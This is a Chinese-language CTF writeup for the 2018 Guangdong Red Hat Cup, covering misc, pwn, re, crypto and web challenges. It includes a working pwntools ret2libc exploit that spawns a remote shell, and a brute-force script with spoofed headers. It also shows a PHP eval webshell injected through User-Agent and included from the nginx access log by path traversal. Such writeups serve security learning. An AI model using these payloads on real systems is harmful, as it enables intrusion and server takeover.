kir[A]'s 小黑屋

广东红帽杯2018 writeup

字数统计: 1.6k阅读时长: 8 min
2018/05/02 Share

Misc

Not Only Wireshark(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip?pass=null
hint: tshark
打开流量包,直接查看http数据,发现存在很多name=xxx的访问记录,将所有16进制提取出来。

1
# strings 123.pcapng| grep name| grep -oP "name=[0-9A-F]+"| tr -d 'name='|tr -d '\n' > flag

修复zip文件头

密码是:?id=1128%23

1
2
3
# strings 123.pcapng| grep key
&GET /xss/example4.php?key=?id=1128%23 HTTP/1.1
Referer: http://10.211.55.15/xss/example4.php?key=?id=1128%23

这是道web题?(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/yunCMS_256035f22b73fdb1c90fd7503c4005ed.zip?pass=null
直接用D盾扫一下,发现一个jsp大马和一个变形php一句话

打开jsp大马看到<Bad way. Get OUT. No000000000flag>,估计不在这里

然后打开变形php一句话,发现下面有提示:

1
2
3
4
5
You eventually found me
I am a hacker from Georgia
You are doing too much food at your upload
Used tshark to make traffic records?
Then you go to the traffic to find me

打开同目录下的流量包78466550-3fc1-11e8-9828-32001505e920.pcapng,找到访问companytplfiles.php的流量,发现里面有一个jpg和gif,flag就在gif里面。

1
2
>>> print ''.join([chr(x) for x in [102,108,97,103,123,83,48,50,50,121,52,111,114,114,53,125]])
flag{S022y4orr5}

听说你们喜欢手工爆破(solved)

flag{}内英文字母为大写形式
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/OS_038c9291c8039792d1aad140f6664671.iso?pass=null
根据提示,应该是曼彻斯特码,不过本题的编码不是标准编码,需要脑洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#coding:utf-8
a = '123654AAA678876303555111AAA77611A321'
# 她现在住在F5街区F5街道07号幢
f = '0'+bin(int('0x'+a,16))[2:]
print f,len(f)

f2 = ''
for i in range(0,142,2):
if f[i:i+2] == '01':
f2 += '0'
else:
f2 += '1'
print f2,len(f2)

flag = ''
for i in range(0,71,8):
tmp = f2[i:i+8][::-1]
flag += hex(int(tmp[:4],2))[2:]
flag += hex(int(tmp[4:],2))[2:]
print flag.upper()

pwn

game server(solved)

nc 123.59.138.180 20000
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/game_server_ccc0d7c007817105ab5b9d10c6f1c8b1.zip?pass=null

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int sub_8048637()
{
char s; // [esp+7h] [ebp-111h]
char v2; // [esp+107h] [ebp-11h]
size_t nbytes; // [esp+108h] [ebp-10h]
char *v4; // [esp+10Ch] [ebp-Ch]

puts("Welcome to my game server");
puts("First, you need to tell me you name?");
fgets(byte_804A180, 256, stdin);
v4 = strrchr(byte_804A180, 10);
if ( v4 )
*v4 = 0;
printf("Hello %s\n", byte_804A180);
puts("What's you occupation?");
fgets(byte_804A080, 256, stdin);
v4 = strrchr(byte_804A080, 10);
if ( v4 )
*v4 = 0;
printf("Well, my noble %s\n", byte_804A080);
nbytes = snprintf(
&s,
0x100u,
"Our %s is a noble %s. He is come from north and well change out would.",
byte_804A180,
byte_804A080);
puts("Here is you introduce");
puts(&s);
puts("Do you want to edit you introduce by yourself?[Y/N]");
v2 = getchar();
getchar();
if ( v2 == 89 )
read(0, &s, nbytes); //此处存在栈溢出
return printf("name : %s\noccupation : %s\nintroduce : %s\n", byte_804A180, byte_804A080, &s);
}

最后修改introduce的地方存在明显栈溢出,程序只开了NX,直接利用puts进行泄露函数地址,然后查找对应的libc,计算system偏移getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#coding:utf-8
from pwn import *
context(arch = 'i386', os = 'linux')
LOCAL = 0
remote_addr = '123.59.138.180'
remote_port = 20000

if LOCAL:
p = process('./pwn2')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
p = remote(remote_addr,remote_port)
libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')

elf = ELF('./pwn2')

def foo(payload):
name = 255*'A'
p.sendafter('name?\n',name)
noble = '1'*255
p.sendafter('occupation?\n',noble)
p.sendlineafter('[Y/N]\n','Y')
p.send(payload)

put = elf.plt['puts']
junk = 277*'A'
payload =junk + p32(put) + p32(0x08048637) + p32(elf.got['puts'])
foo(payload)
p_addr =u32(p.recvuntil('\xf7')[-4:])
success(hex(p_addr))
libc.address = p_addr - libc.symbols['puts']
success(hex(libc.address))
success(hex(libc.symbols['system']))
payload2 = junk + p32(libc.symbols['system']) + p32(0) + p32(next(libc.search('/bin/sh')))
foo(payload2)
p.interactive()

Shellcode Manager

nc 123.59.138.180 13579
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/shellcode_manager_0cb5a25a8f7fd4d3b5a12b0bb19d8834.zip?pass=null

Starcraft RPG

nc 123.59.138.180 13799
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/starcraft_rpg_507f28c1a20762caf02ffc693f6978eb.zip?pass=null

re

icm(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/icm_49785d49972274eac2273fb2bc3a5704.zip?pass=null

wcm(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/wcm_d46106eb128a18a826d1faab3cf60571.zip?pass=null

Explain

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/explain_bbb5702a489a0c0eaac68e6a6fd7329b.zip?pass=null

ccm

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/ccm_74cf0e74e3b38a20fefb73d81eb5f0b8.zip?pass=null

crypt

3dlight

nc 123.59.138.211 20000
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/3dlight_8fe7455b6f72d04629763acf7a793b59.zip?pass=null

rsa system

nc 123.59.138.211 23333
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/rsa_system_89ab28deea7b30d99a949f2220aac31b.zip?pass=null

advanced ecc

nc 123.59.138.211 34545
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/advanced_ecc_a48db2b810bb655bf9e4992894cdbf06.zip?pass=null

web

simple upload(solved)

这次在你面前的网站的功能非常简单,接受挑战吧!
直接传jsp小马getshell

shopping log(solved)

http://123.59.141.153/
或者 http://120.132.95.234/
首先需要修改系统hosts文件,然后绕过http header各种限制,最后进入一个订单查询系统,根据提示,直接从9999开始往下爆。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#coding:utf-8
import hashlib
import requests
import re

def md5(x):
return hashlib.md5(x).hexdigest()

def getcode(mdcode):
s3='qwertyuiopasdfghjklzxcvbnm1234567890'
for i in s3:
for j in s3:
for m in s3:
for n in s3:
for a in s3:
s=i+j+m+n+a
if md5(s)[0:6]==mdcode:
return s

url = 'http://www.tmvb.com/5a560e50e61b552d34480017c7877467info.php'
url2 = 'http://www.tmvb.com/api.php?action=report'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3','Connection': 'keep-alive',
'Referer':'www.dww.com','Accept-Language': 'ja','X-Forward-For':'133.1.16.172',
'Cookie':'PHPSESSID=48ja11agl6fbo52gsntfk4feq1'
}
# 订单编号:<input type="text" id="TxtTid" placeholder="请输入订单编号后四位" style="margin-right: 30px;" />
# 验证码:<input type="text" id="code" placeholder="code" style="width:40px;" /><p>substr(md5(code),0,6) === '167d9f'</p>

n = 9999
while n > 0:
r = requests.get(url=url,headers=headers)
#print r.content
vcode = re.findall(r"=== '(.{6})'",r.content)[0]
print vcode
vv = getcode(vcode)
#print vv , md5(vv)
dat = {'TxtTid':str(n),'code':vv}
r = requests.post(url=url2,headers=headers,data=dat)
print dat
print r.content
if 'There\'s no such order' not in r.content:
break
if '"error":1' in r.content:
continue
#raw_input('go on~')
n -= 1

guess id

http://123.59.134.192/
http://120.132.94.238/
hint: 身份证号码是有一定规律的
hint2: AES256是很棒的加密算法, ECB模式很容易理解

biubiubiu(solved)

这次在你面前的网站看起来很复杂,接受挑战吧!
http://ff970e071ecc41dcb5f51c0ff0b8ac273cce9a8ac0d44936.game.ichunqiu.com/index.php?page=login.php
存在文件包含漏洞

关键代码send.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if (@$_POST['url']) {
$url = @$_POST['url'];
if(preg_match("/^http(s?):\/\/.+/", $url)){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
curl_setopt($ch,CURLOPT_REDIR_PROTOCOLS,CURLPROTO_GOPHER|CURLPROTO_HTTP|CURLPROTO_HTTPS);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
}
?>

数据库信息conn.php

1
2
3
4
$db_host = 'mysql';
$db_name = 'user_admin';
$db_user = 'Dog';
$db_pwd = '';

user.sql

1
2
3
4
5
6
7
DROP TABLE IF EXISTS `admin`;
CREATE TABLE `admin` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`username` varchar(32) DEFAULT NULL,
`password` varchar(43) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

思路:将一句话写在User-Agent,然后包含nginx的access.log。

1
curl http://b4249514f2884c21859174e65ddd2615d8f7f25d5a9947b1.game.ichunqiu.com/index.php --header "User-Agent:<?php eval(\$_POST['1'])?>"

然后用菜刀连接

1
http://b4249514f2884c21859174e65ddd2615d8f7f25d5a9947b1.game.ichunqiu.com/index.php?page=../../../var/log/nginx/access.log

flag在数据中,用菜刀自带的数据库功能读取即可。

CATALOG
  1. 1. Misc
    1. 1.1. Not Only Wireshark(solved)
    2. 1.2. 这是道web题?(solved)
    3. 1.3. 听说你们喜欢手工爆破(solved)
  2. 2. pwn
    1. 2.1. game server(solved)
    2. 2.2. Shellcode Manager
    3. 2.3. Starcraft RPG
  3. 3. re
    1. 3.1. icm(solved)
    2. 3.2. wcm(solved)
    3. 3.3. Explain
    4. 3.4. ccm
  4. 4. crypt
    1. 4.1. 3dlight
    2. 4.2. rsa system
    3. 4.3. advanced ecc
  5. 5. web
    1. 5.1. simple upload(solved)
    2. 5.2. shopping log(solved)
    3. 5.3. guess id
    4. 5.4. biubiubiu(solved)